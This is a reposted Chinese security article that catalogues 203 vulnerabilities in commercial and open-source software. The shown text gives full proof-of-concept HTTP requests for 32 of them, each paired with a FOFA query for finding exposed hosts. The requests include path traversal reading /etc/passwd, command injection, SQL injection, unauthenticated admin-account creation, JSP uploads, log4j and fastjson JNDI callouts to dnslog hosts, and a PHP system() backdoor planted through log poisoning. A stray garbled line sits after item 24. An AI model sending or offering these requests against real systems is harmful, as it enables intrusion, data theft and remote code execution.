Compilation of publicly disclosed Internet vulnerabilities, 202309-202406 (reposted)

Posted on 2024-6-5 14:31:29

Compilation of publicly disclosed Internet vulnerabilities, 202309-202406
道一安全, 2024-06-05 07:41, Beijing
The following article originally appeared on 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attacks, so we hope this article is of some help to defenders. Defensive teams can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 PoCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were collected and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Article content: because of length limits, a few PoCs that were too long have been replaced with the placeholder PAYLOAD; search for the full PoC yourself if you need it.

Legitimate rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team via the back end and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for a keyword.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents
01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-pass smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service washing machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording and broadcasting system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 back end sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information release system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. Lean value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. 方正 all-media news gathering and editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02
1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the back end with the default account admin, perform the operation below:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step-one login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; the planted code runs a function on a base64-decoded request header value.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}


24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

/ r: ^7 I4 H0 G0 o: L
25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
